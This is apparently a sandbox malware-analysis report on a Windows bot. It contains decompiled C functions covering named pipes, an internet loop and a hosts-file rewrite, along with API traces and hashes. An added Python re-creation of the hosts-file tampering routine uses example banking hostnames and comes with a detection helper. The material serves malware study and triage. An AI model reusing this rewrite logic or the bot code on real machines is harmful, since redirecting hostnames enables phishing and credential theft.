    				return RtlExitUserThread();
    			}

    APIs
    • CreateMutexW.KERNEL32(Function_00013468,00000000,?), ref: 00408FA3
    • SetEvent.KERNEL32(?), ref: 00408FAF
    • DisconnectNamedPipe.KERNEL32(?), ref: 00408FB7
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00408FC1
    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00408FD6
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00408FFD
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00409020
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00409061
    • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040908F
    • WriteFile.KERNEL32(?,00A00000,00000004,?,00000000), ref: 004090AD
    • WriteFile.KERNEL32(?,?,00A00000,?,00000000), ref: 004090C5
    • FlushFileBuffers.KERNEL32(?), ref: 004090CD
    • DisconnectNamedPipe.KERNEL32(?,?), ref: 004090DD
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 004090E7
    • CloseHandle.KERNEL32(?), ref: 004090F9
    • SetEvent.KERNEL32(?), ref: 00409102
    • RtlExitUserThread.NTDLL(00000000), ref: 00409109
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$NamedPipeReadWrite$DisconnectEventObjectSingleWait$BuffersCloseConnectCreateExitFlushHandleMutexThreadUser
    • String ID:
    • API String ID: 1315446275-0
    • Opcode ID: 556070a87038c07dcb6e6fa3e7de1799797b4f076c4313f04c1055f305819c70
    • Instruction ID: 0cb2e5f646281ea7631582c9499c13ef43426c1b221fdafdf767c364a77c5c70
    • Opcode Fuzzy Hash: 556070a87038c07dcb6e6fa3e7de1799797b4f076c4313f04c1055f305819c70
    • Instruction Fuzzy Hash: F9510675800108FFDB219FA5EE489EFBBB9EF44341B10842AF642E2164E7769E50DB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00408841() {
    				char _v12;
    				HANDLE* _v48;
    				long _v52;
    				void _v64;
    				intOrPtr _v92;
    				void* __esi;
    				void* _t28;
    				intOrPtr _t33;
    				intOrPtr _t40;
    				intOrPtr _t43;
    				void* _t48;
    				void* _t53;
    				signed int _t54;
    				void* _t56;
    				HANDLE* _t59;
    				intOrPtr _t67;
    				intOrPtr _t69;
    				intOrPtr _t70;
    
    				E0040CFFE( &_v12,  &_v12, 0, 8);
    				L00403961();
    				E00410678();
    				E004077B4();
    				 *0x412dd0(0x412950, _t53, _t56, _t48);
    				E0040FC06();
    				E0040CFFE(SetThreadPriority(GetCurrentThread(), 2), 0x412970, 0, 0x10);
    				 *0x412974 = CreateEventW(0, 1, 0, 0);
    				E00410635();
    				_t28 = InternetOpenA( *0x413488, 0, 0, 0, 0);
    				 *0x412978 = _t28;
    				_v64 = 0xea60;
    				InternetSetOptionA(_t28, 2,  &_v64, 4);
    				E00409725(0);
    				E00406A74(0x4121c0,  &_v64, 0,  *0x412c18);
    				_t33 =  *0x412a64; // 0x246f5a8
    				_v92 = E00409115( &_v64, 0, E004086E1,  *((intOrPtr*)(_t33 + 0x28)));
    				 *0x412706 = 0;
    				 *0x412970 = 0;
    				L1:
    				L1:
    				if(WaitForSingleObject( *0x412974, 0x14) == 0) {
    					 *0x412970 = 1;
    				}
    				_t67 =  *0x412970; // 0x0
    				if(_t67 != 0) {
    					goto L9;
    				}
    				_t43 =  *0x412a64; // 0x246f5a8
    				if(E00409241( *((intOrPtr*)(_t43 + 0x30))) != 0) {
    					goto L1;
    				} else {
    					_t69 =  *0x412970; // 0x0
    					if(_t69 == 0) {
    						E00408723( &_v52);
    						WaitForSingleObject( *0x412974, 0xffffffff);
    						while(1) {
    							_t70 =  *0x412970; // 0x0
    							if(_t70 <= 0) {
    								goto L9;
    							}
    							Sleep(0x14);
    						}
    					}
    				}
    				L9:
    				_t59 = _v48;
    				WaitForMultipleObjects(_v52, _t59, 1, 0xffffffff);
    				_t54 = 0;
    				if(_v52 > 0) {
    					do {
    						CloseHandle(_t59[_t54]);
    						_t54 = _t54 + 1;
    					} while (_t54 < _v52);
    				}
    				E0040CF40(_t59);
    				CloseHandle( *0x412974);
    				InternetCloseHandle( *0x412978);
    				_t40 =  *0x412a64; // 0x246f5a8
    				return E004091EC(_v64,  *((intOrPtr*)(_t40 + 0x28)));
    			}

    APIs
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(?,0246F5A8,?), ref: 0041069F
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(00413260,00413260,?), ref: 004106AE
    • RtlInitializeCriticalSection.NTDLL(00412950), ref: 00408870
    • GetCurrentThread.KERNEL32 ref: 0040887D
    • SetThreadPriority.KERNEL32(00000000), ref: 00408884
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00412970,00000000,00000010), ref: 0040889E
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 004088B8
    • InternetSetOptionA.WININET ref: 004088D5
      • Part of subcall function 00409725: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 00409858
      • Part of subcall function 00409115: RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 00409138
    • WaitForSingleObject.KERNEL32(00000014,004086E1,?), ref: 0040891C
    • WaitForSingleObject.KERNEL32(000000FF,?), ref: 0040895F
    • Sleep.KERNEL32(00000014), ref: 00408969
    • WaitForMultipleObjects.KERNEL32(0000EA60,0000EA60,00000001,000000FF), ref: 00408983
    • CloseHandle.KERNEL32(0000EA60), ref: 00408994
    • CloseHandle.KERNEL32(0000EA60), ref: 004089AD
    • InternetCloseHandle.WININET ref: 004089B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandleInternetWait$CombineObjectPathSingleThread$AllocateBuffCharCreateCriticalCurrentEventHeapInitializeLowerMultipleObjectsOpenOptionPrioritySectionSleep
    • String ID: `
    • API String ID: 2138626244-1850852036
    • Opcode ID: 915aaa268c7ec8444cbfee55a4d2ca3b0cc020c750ec5310755a41839f443b50
    • Instruction ID: f440cd505804de12f7b188d0e44ca0d33965df2cbf40e48425697d43f4bd20c9
    • Opcode Fuzzy Hash: 915aaa268c7ec8444cbfee55a4d2ca3b0cc020c750ec5310755a41839f443b50
    • Instruction Fuzzy Hash: CF41A0B1214201AFD710BF65EE49AAA3B69FB44344F00853EB241E21B1DFB44860DB6E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040614A(void* _a4) {
    				void* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				void* _v28;
    				char* _v32;
    				intOrPtr* _v36;
    				void* _v40;
    				short _v560;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t71;
    				void* _t75;
    				long _t76;
    				intOrPtr _t83;
    				char* _t85;
    				signed int _t103;
    				long _t104;
    				signed int _t111;
    				intOrPtr _t112;
    				intOrPtr* _t113;
    				intOrPtr* _t114;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				intOrPtr _t118;
    				intOrPtr _t119;
    				intOrPtr _t122;
    				void* _t128;
    				intOrPtr _t136;
    				void* _t137;
    				void* _t144;
    				void* _t146;
    				void* _t148;
    				void* _t149;
    				signed int _t151;
    				void* _t152;
    				intOrPtr* _t153;
    
    				 *0x412a6c(0,  &_v560, 0x25, 1);
    				_t71 =  *0x412a64; // 0x246f5a8
    				PathCombineW( &_v560,  &_v560,  *(_t71 + 0x14c));
    				_t75 = CreateFileW( &_v560, 0xc0000000, 1, 0, 4, 0, 0);
    				_t149 = _t75;
    				_v8 = _t149;
    				if(_t149 == 0xffffffff) {
    					return _t75;
    				}
    				_t76 = GetFileSize(_t149, 0);
    				_v12 = _t76;
    				if(_t76 == 0) {
    					L59:
    					return CloseHandle(_v8);
    				}
    				_t144 = E0040CF2D(_t76);
    				_v40 = _t144;
    				if(_t144 == 0) {
    					L58:
    					goto L59;
    				}
    				if(ReadFile(_t149, _t144, _v12,  &_v12, 0) == 0) {
    					L57:
    					E0040CF40(_v40);
    					goto L58;
    				}
    				_t83 = E00408F05(_v12, _t144,  &_v12);
    				_v24 = _t83;
    				if(_t83 == 0) {
    					goto L57;
    				} else {
    					_v28 = _a4;
    					while(1) {
    						_t85 = E0040D611(_v28, 1);
    						_v32 = _t85;
    						if(_t85 == 0) {
    							break;
    						} else {
    							if( *_t85 == 0x21) {
    								_v32 = _t85 + 1;
    							}
    						}
    						_t111 = 0;
    						_v20 = 0;
    						if(_v12 <= 0) {
    							L41:
    							_t112 = E0040D611(_v28, 2);
    							_v28 = _t112;
    							if(_t112 != 0) {
    								continue;
    							}
    							break;
    						} else {
    							goto L10;
    						}
    						do {
    							L10:
    							_t113 = _v24 + _t111 * 4;
    							_v36 = _t113;
    							_t114 =  *_t113;
    							if(_t114 != 0) {
    								_t153 = _t114;
    								while(1) {
    									_t116 =  *_t153;
    									if(_t116 != 0x20 && _t116 != 9) {
    										break;
    									}
    									_t153 = _t153 + 1;
    								}
    								_t117 =  *_t153;
    								if(_t117 != 0x23 && _t117 != 0xd && _t117 != 0xa && _t117 != 0) {
    									while(_t117 != 9) {
    										if(_t117 == 0x20 || _t117 == 9) {
    											break;
    										} else {
    											if(_t117 == 0) {
    												goto L40;
    											}
    											_t153 = _t153 + 1;
    											_t117 =  *_t153;
    											continue;
    										}
    									}
    									if( *_t153 == 0) {
    										goto L40;
    									} else {
    										goto L26;
    									}
    									while(1) {
    										L26:
    										_t118 =  *_t153;
    										if(_t118 != 9 && _t118 != 0x20) {
    											break;
    										}
    										_t153 = _t153 + 1;
    									}
    									_t119 =  *_t153;
    									if(_t119 != 0x23 && _t119 != 0xd && _t119 != 0xa && _t119 != 0) {
    										_t148 = E0040D3C6(_v32);
    										if(E0040D3EC(_t120, _t153, _t148, _v32) == 0) { // _t120 is never assigned in this listing (decompiler artifact: an unrecovered register argument)
    											_t122 =  *((intOrPtr*)(_t148 + _t153));
    											if(_t122 == 0x20 || _t122 == 0xd || _t122 == 0xa || _t122 == 0x23 || _t122 == 0) {
    												E0040CF40( *_v36);
    												 *_v36 = 0;
    											}
    										}
    									}
    								}
    							}
    							L40:
    							_t111 = _v20 + 1;
    							_v20 = _t111;
    						} while (_t111 < _v12);
    						goto L41;
    					}
    					_v20 = _v20 | 0xffffffff;
    					SetFilePointer(_v8, 0, 0, 0);
    					SetEndOfFile(_v8);
    					_t151 = 0;
    					if(_v12 <= 0) {
    						L46:
    						_t146 = _a4;
    						_t152 = "\r\n";
    						do {
    							_t128 = E0040D611(_t146, 1);
    							if(_t128 == 0) {
    								break;
    							}
    							if( *_t128 != 0x21) {
    								if(_t146 == _a4) {
    									_t103 = _v20;
    									if(_t103 != 0xffffffff) {
    										_t136 =  *((intOrPtr*)(_v24 + _t103 * 4));
    										_t104 = E0040D3C6(_t136);
    										_v16 = _t104;
    										if(_t104 != 0 &&  *((char*)(_t136 + _t104 - 1)) != 0xa) {
    											WriteFile(_v8, _t152, 2,  &_v16, 0);
    										}
    									}
    								}
    								WriteFile(_v8, _t146, E0040D3C6(_t146),  &_v16, 0);
    								WriteFile(_v8, " ", 1,  &_v16, 0);
    								WriteFile(_v8, _t128, E0040D3C6(_t128),  &_v16, 0);
    								WriteFile(_v8, _t152, 2,  &_v16, 0);
    							}
    							_t146 = E0040D611(_t146, 2);
    						} while (_t146 != 0);
    						FlushFileBuffers(_v8);
    						E0040CF5C(_v12, _v24);
    						goto L57;
    					} else {
    						goto L43;
    					}
    					do {
    						L43:
    						_t137 =  *(_v24 + _t151 * 4);
    						if(_t137 != 0) {
    							_v20 = _t151;
    							WriteFile(_v8, _t137, E0040D3C6(_t137),  &_v16, 0);
    						}
    						_t151 = _t151 + 1;
    					} while (_t151 < _v12);
    					goto L46;
    				}
    			}
    Instruction addresses (one per line of the function body above, in the same order)
    0x00406163
    0x00406169
    0x0040617c
    0x00406195
    0x0040619b
    0x0040619d
    0x004061a3
    0x0040643c
    0x0040643c
    0x004061ab
    0x004061b1
    0x004061b6
    0x00406430
    0x00000000
    0x00406433
    0x004061c2
    0x004061c4
    0x004061c9
    0x0040642f
    0x00000000
    0x0040642f
    0x004061e1
    0x00406427
    0x0040642a
    0x00000000
    0x0040642a
    0x004061ef
    0x004061f4
    0x004061f9
    0x00000000
    0x004061ff
    0x00406202
    0x00406205
    0x0040620a
    0x0040620f
    0x00406214
    0x00000000
    0x0040621a
    0x0040621d
    0x00406220
    0x00406220
    0x0040621d
    0x00406223
    0x00406225
    0x0040622b
    0x004062ef
    0x004062f4
    0x004062f9
    0x004062fe
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406231
    0x00406231
    0x00406234
    0x00406237
    0x0040623a
    0x0040623e
    0x00406244
    0x00406246
    0x00406246
    0x0040624a
    0x00000000
    0x00000000
    0x00406250
    0x00406250
    0x00406253
    0x00406257
    0x0040627a
    0x0040626d
    0x00000000
    0x00406273
    0x00406275
    0x00000000
    0x00000000
    0x00406277
    0x00406278
    0x00000000
    0x00406278
    0x0040626d
    0x00406280
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406282
    0x00406282
    0x00406282
    0x00406286
    0x00000000
    0x00000000
    0x0040628c
    0x0040628c
    0x0040628f
    0x00406293
    0x004062a9
    0x004062b7
    0x004062b9
    0x004062be
    0x004062d5
    0x004062dd
    0x004062dd
    0x004062be
    0x004062b7
    0x00406293
    0x00406257
    0x004062df
    0x004062e2
    0x004062e3
    0x004062e6
    0x00000000
    0x00406231
    0x00406304
    0x0040630e
    0x00406317
    0x0040631d
    0x00406322
    0x0040634c
    0x0040634c
    0x0040634f
    0x00406354
    0x0040635d
    0x00406361
    0x00000000
    0x00000000
    0x0040636a
    0x00406373
    0x00406375
    0x0040637b
    0x00406380
    0x00406383
    0x00406388
    0x0040638d
    0x004063a2
    0x004063a2
    0x0040638d
    0x0040637b
    0x004063ba
    0x004063d0
    0x004063e8
    0x004063fa
    0x004063fa
    0x00406409
    0x0040640b
    0x00406416
    0x00406422
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406324
    0x00406324
    0x00406327
    0x0040632c
    0x00406333
    0x00406340
    0x00406340
    0x00406346
    0x00406347
    0x00000000
    0x00406324

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,00000000,01020500), ref: 00406163
    • PathCombineW.SHLWAPI(?,?,?), ref: 0040617C
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000000,00000000), ref: 00406195
    • GetFileSize.KERNEL32(00000000,00000000), ref: 004061AB
    • CloseHandle.KERNEL32(?), ref: 00406433
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 004061D9
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000001), ref: 0040630E
    • SetEndOfFile.KERNEL32(?), ref: 00406317
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406340
    • WriteFile.KERNEL32(?,00401CBC,00000002,?,00000000,00000001), ref: 004063A2
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,00000001), ref: 004063BA
    • WriteFile.KERNEL32(?,00401CA8,00000001,?,00000000), ref: 004063D0
    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004063E8
    • WriteFile.KERNEL32(?,00401CBC,00000002,?,00000000), ref: 004063FA
    • FlushFileBuffers.KERNEL32(?,00000001), ref: 00406416
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Write$Path$AllocateBuffersCloseCombineCreateFlushFolderHandleHeapPointerReadSizeSpecial
    • String ID:
    • API String ID: 3438174515-0
    • Opcode ID: 40669e7909e70ac8e1f7e4548d19464109f1f6a91a46e0adcff658fb62b280a3
    • Instruction ID: d035cecbc1a6ab26862cb8aebec12fb1d86e8cb55c131b0115b7399582cce9ff
    • Opcode Fuzzy Hash: 40669e7909e70ac8e1f7e4548d19464109f1f6a91a46e0adcff658fb62b280a3
    • Instruction Fuzzy Hash: 7F91B231900119AFDF21AFA4CD85AEE7BBAAB09304F1540BAE542F72D0D7784D628B5D
    Uniqueness

    Uniqueness Score: -1.00%
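The listing above reads a file below the CSIDL_SYSTEM folder (0x25) whose name is taken from the configuration block at offset 0x14c, drops every line whose second token equals one of the bot's hostnames, and appends `address hostname` lines of its own. What it parses and writes is the hosts-file format, so `drivers\etc\hosts` is the likely target (an assumption; the report does not show the string). The following Python is an added re-creation of that rewrite for analysis, not code from the sample or from the report. It models E0040D611 as a key/value string list, E00408F05 as a line splitter that keeps the line terminators and E0040D3EC as an exact length-bounded compare; each of these is an assumption and is marked as such in the comments. A small triage helper at the end lists the non-loopback mappings in a hosts file, which is the trace this routine leaves behind.

```python
# Re-creation in Python of the hosts-file rewrite decompiled as E0040614A,
# written for analysis. Added example: not code from the sample or the report.
# Points where the decompilation does not pin down a detail are marked "assumption".
from typing import List, Optional, Sequence, Tuple

# Byte classes taken from the literal compares in the decompiled loop.
COMMENT_OR_EOL = b"#\r\n\x00"      # a token starting with one of these ends the line scan
MATCH_TERMINATORS = b" \r\n#\x00"  # what may follow a matched hostname (TAB is not in the set)


def _matches(line: bytes, hostname: bytes) -> bool:
    """Per-line test: skip blanks, step over the first token (the address),
    skip blanks, then require hostname as the complete second token."""
    n = len(line)

    def ch(k: int) -> int:           # reading past the end yields the NUL the sample sees
        return line[k] if k < n else 0

    i = 0
    while ch(i) in b" \t":
        i += 1
    if ch(i) in COMMENT_OR_EOL:      # blank or comment line
        return False
    while ch(i) not in b" \t":       # address token
        if ch(i) == 0:
            return False
        i += 1
    while ch(i) in b" \t":
        i += 1
    if ch(i) in COMMENT_OR_EOL:      # address with no hostname behind it
        return False
    # assumption: E0040D3EC is an exact, length-bounded byte compare
    if line[i:i + len(hostname)] != hostname:
        return False
    return ch(i + len(hostname)) in MATCH_TERMINATORS


def rewrite_hosts(original: bytes, entries: Sequence[Tuple[bytes, bytes]]) -> bytes:
    """entries are (address, hostname) pairs; assumption: the flat string list
    walked by E0040D611 is such a key/value list. A hostname with a leading '!'
    has its existing lines removed but is not written back."""
    if not original:                  # GetFileSize() == 0: the sample closes the file untouched
        return original
    # assumption: E00408F05 splits into lines that keep their terminator, which is
    # what the later "last byte != '\n'" test relies on
    lines: List[Optional[bytes]] = list(original.splitlines(keepends=True))
    for _, host in entries:
        target = host[1:] if host.startswith(b"!") else host
        for k, ln in enumerate(lines):
            if ln is not None and _matches(ln, target):
                lines[k] = None       # the sample frees the line and NULLs its slot

    out = bytearray()
    last: Optional[bytes] = None
    for ln in lines:                  # L43 loop: surviving lines, in their original order
        if ln is not None:
            out += ln
            last = ln
    for idx, (addr, host) in enumerate(entries):   # L46 loop: the bot's own entries
        if host.startswith(b"!"):
            continue
        # the separator fix-up is tied to the first list node, not the first entry written
        if idx == 0 and last is not None and not last.endswith(b"\n"):
            out += b"\r\n"
        out += addr + b" " + host + b"\r\n"
    return bytes(out)


def redirected_hosts(hosts: bytes) -> List[Tuple[str, str]]:
    """Triage helper: every (address, name) mapping whose address is not
    loopback, i.e. the shape of an entry this routine writes."""
    found = []
    for ln in hosts.splitlines():
        fields = ln.split(b"#", 1)[0].split()
        if len(fields) >= 2 and fields[0] not in (b"127.0.0.1", b"::1"):
            found.extend((fields[0].decode(), f.decode()) for f in fields[1:])
    return found


# Constructed input (not taken from the sample): a comment, leading whitespace,
# an existing line for a targeted name, and a last line without a newline.
HOSTS = (b"# Copyright (c) 1993-2009 Microsoft Corp.\r\n"
         b"127.0.0.1       localhost\r\n"
         b"\t::1   localhost\r\n"
         b"10.0.0.5 update.example-bank.test   # staging\r\n"
         b"192.0.2.7 old.example.test")
ENTRIES = [(b"198.51.100.9", b"update.example-bank.test"),
           (b"198.51.100.9", b"!old.example.test"),
           (b"198.51.100.9", b"www.example-bank.test")]

if __name__ == "__main__":
    result = rewrite_hosts(HOSTS, ENTRIES)
    print(result.decode())
    print(redirected_hosts(result))
```

Two details of the original worth keeping in mind when reading a patched hosts file: a hostname followed by a TAB is not matched (the terminator set is space, CR, LF, '#' and NUL), so such a line survives, and the `\r\n` inserted before the bot's entries depends on the first list node rather than the first entry actually written.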

    C-Code - Quality: 100%
    			E00405E48(void* __eflags) {
    				intOrPtr _v12;
    				intOrPtr _v20;
    				void* __ecx;
    				void* __esi;
    				intOrPtr _t23;
    				WCHAR* _t27;
    				void* _t28;
    				WCHAR* _t29;
    				void* _t30;
    				intOrPtr _t31;
    				intOrPtr _t33;
    				void* _t34;
    				intOrPtr _t35;
    				long _t38;
    				intOrPtr _t39;
    				intOrPtr _t41;
    				intOrPtr _t47;
    				signed int _t49;
    				intOrPtr _t57;
    				intOrPtr _t59;
    				intOrPtr _t61;
    				void* _t64;
    				intOrPtr _t65;
    				void* _t68;
    				void* _t70;
    
    				E004077B4();
    				 *0x412738 = CreateEventW(0, 1, 0, 0);
    				E0040966F(0x412740);
    				_t23 =  *0x412a64; // 0x246f5a8
    				PathCombineW(0x412740, 0x412740,  *(_t23 + 0xc));
    				 *0x412948 = CreateFileW(0x412740, 0x80000000, 0, 0, 3, 0, 0);
    				E00409B3F();
    				_t27 = L00403961();
    				 *0x412730 = _t27;
    				_t28 = CreateFileW(_t27, 0x80000000, 0, 0, 4, 0, 0);
    				 *0x41273c = _t28;
    				if(_t28 == 0xffffffff) {
    					 *0x41273c = 0;
    				}
    				_t29 = E00410678();
    				 *0x412734 = _t29;
    				_t30 = CreateFileW(_t29, 0x80000000, 0, 0, 4, 0, 0);
    				 *0x41294c = _t30;
    				_t73 = _t30 - 0xffffffff;
    				if(_t30 == 0xffffffff) {
    					 *0x41294c = 0;
    				}
    				_t31 =  *0x412a64; // 0x246f5a8
    				_v20 = E00409115(_t64, _t73, E00405CC5,  *((intOrPtr*)(_t31 + 0x2c)));
    				_t33 =  *0x412a64; // 0x246f5a8
    				_t34 = E00409241( *((intOrPtr*)(_t33 + 0x28)));
    				_t74 = _t34;
    				if(_t34 != 0) {
    					_t59 =  *0x412a64; // 0x246f5a8
    					E00409266(_t74,  *((intOrPtr*)(_t59 + 0x28)), 3, 0, 0, 0, 0);
    					while(1) {
    						_t61 =  *0x412a64; // 0x246f5a8
    						if(E00409241( *((intOrPtr*)(_t61 + 0x28))) == 0) {
    							goto L8;
    						}
    						Sleep(0x14);
    					}
    				}
    				L8:
    				_t70 = E004089E8;
    				do {
    					_t35 =  *0x412a64; // 0x246f5a8
    					if(E00409241( *((intOrPtr*)(_t35 + 0x28))) == 0) {
    						_t65 =  *0x412a64; // 0x246f5a8
    						_t49 = 0;
    						_t68 = E00409968( *((intOrPtr*)(_t65 + ((_t49 & 0xffffff00 | ( *0x412af8 & 0x00000001) != 0x00000000) + 5) * 4)));
    						while(E00406DC4(0, _t65, _t70 -  *0x412bac, _t68) == 0) {
    							Sleep(0x14);
    						}
    						while(1) {
    							_t57 =  *0x412a64; // 0x246f5a8
    							if(E00409241( *((intOrPtr*)(_t57 + 0x28))) != 0) {
    								goto L16;
    							}
    							Sleep(0x14);
    						}
    					}
    					L16:
    					E00409B88(0x412740);
    					Sleep(0x64);
    					_t38 = WaitForSingleObject( *0x412738, 0x32);
    					_t80 = _t38;
    				} while (_t38 != 0);
    				_t39 =  *0x412a64; // 0x246f5a8
    				E00409266(_t80,  *((intOrPtr*)(_t39 + 0x28)), 3, 0, 0, 0, 0);
    				while(1) {
    					_t41 =  *0x412a64; // 0x246f5a8
    					if(E00409241( *((intOrPtr*)(_t41 + 0x28))) == 0) {
    						break;
    					}
    					Sleep(0x14);
    				}
    				CloseHandle( *0x412738);
    				CloseHandle( *0x41273c);
    				CloseHandle( *0x41294c);
    				CloseHandle( *0x412948);
    				_t47 =  *0x412a64; // 0x246f5a8
    				return E004091EC(_v12,  *((intOrPtr*)(_t47 + 0x2c)));
    			}
    Instruction addresses (one per line of the function body above, in the same order)
    0x00405e4d
    0x00405e5f
    0x00405e6b
    0x00405e70
    0x00405e7a
    0x00405e93
    0x00405e98
    0x00405e9d
    0x00405eaa
    0x00405eaf
    0x00405eb5
    0x00405ebd
    0x00405ebf
    0x00405ebf
    0x00405ec5
    0x00405ed2
    0x00405ed7
    0x00405edd
    0x00405ee2
    0x00405ee5
    0x00405ee7
    0x00405ee7
    0x00405eed
    0x00405eff
    0x00405f03
    0x00405f0b
    0x00405f10
    0x00405f12
    0x00405f14
    0x00405f22
    0x00405f31
    0x00405f31
    0x00405f40
    0x00000000
    0x00000000
    0x00405f2b
    0x00405f2b
    0x00405f31
    0x00405f42
    0x00405f42
    0x00405f47
    0x00405f47
    0x00405f56
    0x00405f5f
    0x00405f67
    0x00405f76
    0x00405f82
    0x00405f7c
    0x00405f7c
    0x00405fa1
    0x00405fa1
    0x00405fb0
    0x00000000
    0x00000000
    0x00405f9b
    0x00405f9b
    0x00405fa1
    0x00405fb2
    0x00405fb3
    0x00405fba
    0x00405fc8
    0x00405fce
    0x00405fce
    0x00405fd6
    0x00405fe4
    0x00405ff3
    0x00405ff3
    0x00406002
    0x00000000
    0x00000000
    0x00405fed
    0x00405fed
    0x0040600a
    0x00406016
    0x00406022
    0x0040602e
    0x00406034
    0x0040604a

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00405E59
      • Part of subcall function 0040966F: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    • PathCombineW.SHLWAPI(00412740,00412740,?), ref: 00405E7A
    • CreateFileW.KERNEL32(00412740,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00405E8D
      • Part of subcall function 00409B3F: PathCombineW.SHLWAPI(?,?,0246F5A8), ref: 00409B62
      • Part of subcall function 00409B3F: CreateDirectoryW.KERNEL32(?,00000000), ref: 00409B71
      • Part of subcall function 00409B3F: SetFileAttributesW.KERNEL32(?,00000006), ref: 00409B80
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00405EAF
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00405ED7
    • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000,?,Function_00005CC5,?), ref: 00405F2B
    • Sleep.KERNEL32(00000014,-0000A1C4,00000000,0246F5A8,?,?,Function_00005CC5,?), ref: 00405F7C
    • Sleep.KERNEL32(00000014,?,-0000A1C4,00000000), ref: 00405F9B
    • Sleep.KERNEL32(00000064,00412740,?,?,Function_00005CC5,?), ref: 00405FBA
    • WaitForSingleObject.KERNEL32(00000032), ref: 00405FC8
    • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000), ref: 00405FED
      • Part of subcall function 004091EC: SetEvent.KERNEL32(?,00000000,004089D0,?), ref: 004091F6
      • Part of subcall function 004091EC: WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040920F
      • Part of subcall function 004091EC: CloseHandle.KERNEL32(00000004), ref: 00409217
      • Part of subcall function 004091EC: CloseHandle.KERNEL32(?), ref: 00409220
      • Part of subcall function 004091EC: CloseHandle.KERNEL32(?), ref: 00409229
    • CloseHandle.KERNEL32(?), ref: 0040600A
    • CloseHandle.KERNEL32 ref: 00406016
    • CloseHandle.KERNEL32 ref: 00406022
    • CloseHandle.KERNEL32 ref: 0040602E
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateSleep$File$Path$CombineEventObjectSingleWait$AttributesDirectoryFolderSpecial
    • String ID:
    • API String ID: 4283066563-0
    • Opcode ID: f5ca64725814b063a02d9c72717fb00863c755f34a91c1ebf9cf4e67b5540d5c
    • Instruction ID: 1875d51d99516e7fb3559e5a0e5841b5cf9340728af077902e8f6ddd414f643d
    • Opcode Fuzzy Hash: f5ca64725814b063a02d9c72717fb00863c755f34a91c1ebf9cf4e67b5540d5c
    • Instruction Fuzzy Hash: 53514171100241BFC6206B66EF49E9B3F79EB85754B00817AB611E72F2DBB94960DB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00404803() {
    				int _v24;
    				int _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v68;
    				char _v72;
    				int _v76;
    				intOrPtr _v80;
    				char _v84;
    				char _v88;
    				int _v92;
    				char _v100;
    				void* _v104;
    				char _v108;
    				intOrPtr* _v116;
    				intOrPtr* _v128;
    				intOrPtr* _v132;
    				char _v136;
    				intOrPtr* _v144;
    				char _v148;
    				char _v164;
    				intOrPtr* _v168;
    				intOrPtr* _v172;
    				char _v180;
    				intOrPtr* _v188;
    				char _v196;
    				int _v204;
    				char _v208;
    				WCHAR* _v212;
    				intOrPtr _v216;
    				char _v224;
    				short _v232;
    				int _v236;
    				intOrPtr _v240;
    				short _v244;
    				short* _v252;
    				short _v256;
    				char* _v260;
    				short _v264;
    				intOrPtr _v272;
    				void* __edi;
    				_Unknown_base(*)()* _t123;
    				intOrPtr _t126;
    				intOrPtr _t133;
    				intOrPtr* _t140;
    				intOrPtr* _t142;
    				intOrPtr* _t144;
    				intOrPtr* _t146;
    				short _t147;
    				intOrPtr* _t148;
    				short _t149;
    				intOrPtr* _t150;
    				short _t151;
    				intOrPtr* _t152;
    				short _t153;
    				WCHAR* _t155;
    				short _t156;
